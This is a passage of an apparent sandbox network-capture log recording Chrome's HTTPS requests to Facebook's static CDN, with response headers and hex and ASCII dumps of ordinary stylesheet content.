                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 3+JCB0ZR+/9BfbaR2s5bvu/YLCaYnViO0zuoUd33i4hvapmUpUjNaNZ1/3xbigsEX+LfcHnM9itynfPRgt/iMg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:01 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=217, ullat=0
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 8550
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 2e 5f 36 65 66 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 61 73 68 65 64 20 23 66 62 61 30 30 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 36 65 66 75 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 52 6f 62 6f 74 6f 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 6c 6f 63 61 6c 28 27 52 6f 62 6f 74 6f 27 29 2c 20 6c 6f 63 61 6c 28 27 52 6f 62 6f 74 6f 2d 52 65 67 75 6c 61 72 27 29 2c 20 75 72 6c 28 2f 72
                                                                                                                                                                                                                                Data Ascii: ._6eft{display:inline-block;outline:1px dashed #fba000;width:100%}._6efu{display:inline-block;min-height:10px;min-width:10px;width:100%}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:local('Roboto'), local('Roboto-Regular'), url(/r
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 33 34 70 78 20 2d 36 34 32 70 78 7d 2e 73 70 5f 31 70 59 56 4e 71 71 73 32 47 41 2e 73 78 5f 33 30 39 30 33 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 35 31 70 78 20 2d 36 34 32 70 78 7d 2e 73 70 5f 31 70 59 56 4e 71 71 73 32 47 41 2e 73 78 5f 64 34 32 64 39 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 36 38 70 78 20 2d 36 34 32 70 78 7d 2e 73 70 5f 31 70 59 56 4e 71 71 73 32 47 41 2e 73 78 5f 39 33 30 65 37 30 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 38 35 70 78 20 2d 36 34 32 70 78 7d 0a 2e 73 70 5f 71 32 4f 36 53 49 34 46 58 74 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f
                                                                                                                                                                                                                                Data Ascii: kground-position:-34px -642px}.sp_1pYVNqqs2GA.sx_309033{background-position:-51px -642px}.sp_1pYVNqqs2GA.sx_d42d97{background-position:-68px -642px}.sp_1pYVNqqs2GA.sx_930e70{background-position:-85px -642px}.sp_q2O6SI4FXt6{background-image:url(/rsrc.php/
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 42 46 35 2d 4f 65 2e 73 78 5f 61 35 62 32 34 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 35 35 35 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 35 36 36 65 63 33 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 36 37 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 35 30 33 64 30 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 35 37 32 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 64 64 38 61 39 34 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 38 38 70 78 7d
                                                                                                                                                                                                                                Data Ascii: BF5-Oe.sx_a5b246{background-position:0 -555px}.sp_ymtCkBF5-Oe.sx_566ec3{width:20px;height:20px;background-position:0 -67px}.sp_ymtCkBF5-Oe.sx_503d09{background-position:0 -572px}.sp_ymtCkBF5-Oe.sx_dd8a94{width:20px;height:20px;background-position:0 -88px}
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 6f 6e 3a 30 20 2d 37 34 32 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 62 38 38 61 62 32 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 39 33 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 61 33 34 32 31 64 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 32 31 34 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 61 66 30 61 64 30 7b 77 69 64 74 68 3a 31 32 70 78 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 32 37 31 70 78 7d 2e 73 70 5f 79 6d 74 43
                                                                                                                                                                                                                                Data Ascii: on:0 -742px}.sp_ymtCkBF5-Oe.sx_b88ab2{width:20px;height:20px;background-position:0 -193px}.sp_ymtCkBF5-Oe.sx_a3421d{width:20px;height:20px;background-position:0 -214px}.sp_ymtCkBF5-Oe.sx_af0ad0{width:12px;height:12px;background-position:0 -1271px}.sp_ymtC
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 46 35 2d 4f 65 2e 73 78 5f 64 34 39 64 61 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 39 39 37 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 63 30 30 33 34 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 30 31 34 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 63 66 37 33 66 62 7b 77 69 64 74 68 3a 32 30 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 32 39 38 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 35 33 64 61 65 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 30 33 31 70 78 7d 2e 73 70 5f 79 6d 74 43 6b 42 46 35 2d 4f 65 2e 73 78 5f 38
                                                                                                                                                                                                                                Data Ascii: F5-Oe.sx_d49da4{background-position:0 -997px}.sp_ymtCkBF5-Oe.sx_c00346{background-position:0 -1014px}.sp_ymtCkBF5-Oe.sx_cf73fb{width:20px;height:20px;background-position:0 -298px}.sp_ymtCkBF5-Oe.sx_53daeb{background-position:0 -1031px}.sp_ymtCkBF5-Oe.sx_8
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1050INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4c 2f 72 2f 57 6f 7a 76 4e 6e 56 51 6c 4e 31 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 73 70 5f 79 6e 6d 56 37 5a 68 5a 62 6f 2d 2e 73 78 5f 34 34 34 63 64 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 2e 73 70 5f 79 6e 6d 56 37 5a 68 5a 62 6f 2d 2e 73 78 5f 63 36 30 64 38 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 32 31 70 78 7d 2e 73 70
                                                                                                                                                                                                                                Data Ascii: ackground-image:url(/rsrc.php/v3/yL/r/WozvNnVQlN1.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:20px;width:20px}.sp_ynmV7ZhZbo-.sx_444cdf{background-position:0 0}.sp_ynmV7ZhZbo-.sx_c60d8d{background-position:0 -21px}.sp


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                142192.168.2.450074157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC604OUTGET /rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: bWijv3so/uf4Zoa779Whpw==
                                                                                                                                                                                                                                Expires: Mon, 29 Sep 2025 04:55:01 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: cJvEHJlmlb9dQ0wd6ssA1W4ELkf/CgA2IcFWiGviJngChoz1P06uIvQ31Mml7SrVzgwhlbX3ZN8MALN55ONnuA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:55:01 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=233, ullat=0
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 194466
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 2e 5f 37 77 35 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 7d 0a 2e 5f 37 30 61 75 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 5f 37 30 61 77 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 35 29 7d 2e 5f 37 30 61 2d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 72 6f 77 20 6e 6f 77 72 61 70 7d 2e 5f 37 30 61 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66
                                                                                                                                                                                                                                Data Ascii: ._7w5n{-webkit-appearance:none;background:none;border:none;cursor:pointer;padding:0}._70au{background-color:#000;display:inline-block}._70aw{background:rgba(0, 0, 0, .5)}._70a-{align-items:flex-start;display:flex;flex-flow:row nowrap}._70av{background:#f
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 31 36 25 3b 62 6f 74 74 6f 6d 3a 30 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 6c 65 66 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 78 32 20 2e 5f 32 61 6a 6c 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 65 2f 72 2f 2d 53 59 46 54 52 67 67 51 38 68 2e 70 6e 67 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 41 64 73 50 6c 61 63 65 6d 65 6e 74 43 75 73 74 6f 6d 53 65 6c 65 63 74 6f 72 41 6e 69 6d 61 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 49 6e 6e 65 72 7b 30
                                                                                                                                                                                                                                Data Ascii: );background-position:center;background-size:116%;bottom:0;content:'';left:0;opacity:0;position:absolute;right:0;top:0}.x2 ._2ajl:before{background-image:url(/rsrc.php/v3/ye/r/-SYFTRggQ8h.png)}@keyframes AdsPlacementCustomSelectorAnimatedBackgroundInner{0
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 0a 2e 5f 32 71 65 69 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 7d 2e 5f 37 68 65 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 2e 38 38 29 7d 2e 5f 32 71 65 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 35 2c 20 37 39 2c 20 38 36 2c 20 2e 38 38 29 7d 2e 5f 32 71 65 6c
                                                                                                                                                                                                                                Data Ascii: center;display:flex}._2qei{display:none;flex-direction:column;height:100%;justify-content:center;left:0;position:absolute;top:0;width:100%;z-index:10000}._7heh{background-color:rgba(255, 255, 255, .88)}._2qek{background-color:rgba(75, 79, 86, .88)}._2qel
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 31 38 72 65 35 69 61 2d 42 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 30 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 31 68 33 68 73 77 63 2d 42 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 35 31 25 7b 6f 70 61 63 69 74 79 3a 31 7d 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 37 36 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 31 6b 68 71 78 70 65 2d 42 7b 30 25 7b 6c 65 66 74 3a 2d 39 36 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 33 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6c 65 66 74 3a 30 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78
                                                                                                                                                                                                                                Data Ascii: }}@keyframes x18re5ia-B{from{opacity:0}to{opacity:1}}@keyframes x1h3hswc-B{0%{opacity:0}50%{opacity:0}51%{opacity:1}75%{opacity:1}76%{opacity:0}100%{opacity:0}}@keyframes x1khqxpe-B{0%{left:-96px;opacity:0}30%{opacity:0}100%{left:0;opacity:1}}@keyframes x
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 68 7a 79 31 34 35 2d 42 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 6f 70 3a 31 30 30 70 78 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 6f 70 3a 32 32 70 78 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 6b 32 65 63 76 6e 2d 42 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 37 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 70 78 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 78 6d 6b 36 37 6b 6d 2d 42 7b 30 25 7b 62 6f 74 74 6f 6d 3a 2d 31 30 30 70 78 3b
                                                                                                                                                                                                                                Data Ascii: ground-color:inherit}}@keyframes xhzy145-B{0%{opacity:0;top:100px}50%{opacity:.5}100%{opacity:1;top:22px}}@keyframes xk2ecvn-B{0%{transform:translateY(0)}70%{transform:translateY(-100px)}100%{transform:translateY(0)}}@keyframes xmk67km-B{0%{bottom:-100px;
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 6d 3a 36 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 69 67 2d 62 6c 75 65 2d 36 30 29 7d 2e 78 31 31 32 74 61 38 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 7d 2e 78 31 31 38 6a 78 76 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 69 6e 73 69 64 65 7d 2e 78 31 32 30 30 7a 79 62 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 66 64 73 2d 67 72 61 79 2d 31 30 29 7d 2e 78 31 32 35 73 79 39 67 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 67 65 6f 64 65 73 69 63 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 64 69 76 69 64 65 72 2d 64 65 66 61 75 6c 74 2d 64 69 73 61 62 6c 65 64 29 7d 2e 78 31 32 61 77 39 75 6e 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20
                                                                                                                                                                                                                                Data Ascii: m:6px solid var(--big-blue-60)}.x112ta8{border-bottom:none}.x118jxv{list-style:inside}.x1200zyb{border-top:1px solid var(--fds-gray-10)}.x125sy9g{border-top:1px solid var(--geodesic-color-border-divider-default-disabled)}.x12aw9un{border-bottom:1px solid
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 74 72 61 6e 73 69 74 69 6f 6e 3a 6d 61 78 2d 68 65 69 67 68 74 20 2e 32 35 73 2c 70 61 64 64 69 6e 67 20 2e 32 35 73 7d 2e 78 31 66 33 63 6a 79 68 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 7d 2e 78 31 66 33 75 79 76 34 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 7d 2e 78 31 66 38 68 6c 71 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 66 64 73 2d 61 63 74 69 76 65 2d 69 63 6f 6e 29 7d 2e 78 31 67 65 62 72 6b 39 7b 66 6c 65 78 3a 31 20 31 20 31 30 30 25 7d 2e 78 31 67 66 6a 75 72 6e 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 66 64 73 2d
                                                                                                                                                                                                                                Data Ascii: transition:max-height .25s,padding .25s}.x1f3cjyh{border-bottom:1px solid rgba(0,0,0,.08)}.x1f3uyv4{text-decoration:underline dotted}.x1f8hlqa{border-bottom:2px solid var(--fds-active-icon)}.x1gebrk9{flex:1 1 100%}.x1gfjurn{border-top:2px solid var(--fds-
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC663INData Raw: 79 2d 32 30 29 7d 2e 78 31 74 73 72 74 6a 38 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 66 64 73 2d 75 6e 69 66 69 65 64 2d 67 72 61 79 2d 38 30 29 7d 2e 78 31 75 32 72 76 6e 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 69 67 2d 67 72 61 79 2d 33 30 29 7d 2e 78 31 75 74 6f 39 70 6a 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 66 64 73 2d 64 69 76 69 64 65 72 2d 6f 6e 2d 77 61 73 68 29 7d 2e 78 31 75 79 77 65 65 62 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 64 69 73 63 20 6f 75 74 73 69 64 65 7d 2e 78 31 76 72 72 75 63 79 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 23 31 37 37 31 65 64 7d 2e 78
                                                                                                                                                                                                                                Data Ascii: y-20)}.x1tsrtj8{border-bottom:1px solid var(--fds-unified-gray-80)}.x1u2rvn{border-bottom:1px solid var(--big-gray-30)}.x1uto9pj{border-top:1px solid var(--fds-divider-on-wash)}.x1uyweeb{list-style:disc outside}.x1vrrucy{border-bottom:2px solid #1771ed}.x
                                                                                                                                                                                                                                2024-09-29 04:55:01 UTC1500INData Raw: 79 37 36 65 6c 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 77 68 69 74 65 7d 2e 78 37 36 69 68 65 74 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 7d 2e 78 37 6f 67 35 62 39 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 62 69 67 2d 67 72 61 79 2d 33 30 29 7d 2e 78 37 76 70 36 66 33 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 39 65 61 65 62 7d 2e 78 38 68 72 39 33 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 34 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 67 65 6f 64 65 73 69 63 2d 63 6f 6c 6f 72 2d 64 61 74 61 2d 76 69 7a 2d 70 6c 75 6d 29 7d 2e 78 38 6a 74 78 66 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 61 73 68 65 64
                                                                                                                                                                                                                                Data Ascii: y76el{border-bottom:1px solid white}.x76ihet{border-top:none}.x7og5b9{border-top:1px solid var(--big-gray-30)}.x7vp6f3{border-top:1px solid #e9eaeb}.x8hr93c{border-top:4px solid var(--geodesic-color-data-viz-plum)}.x8jtxfr{text-decoration:underline dashed
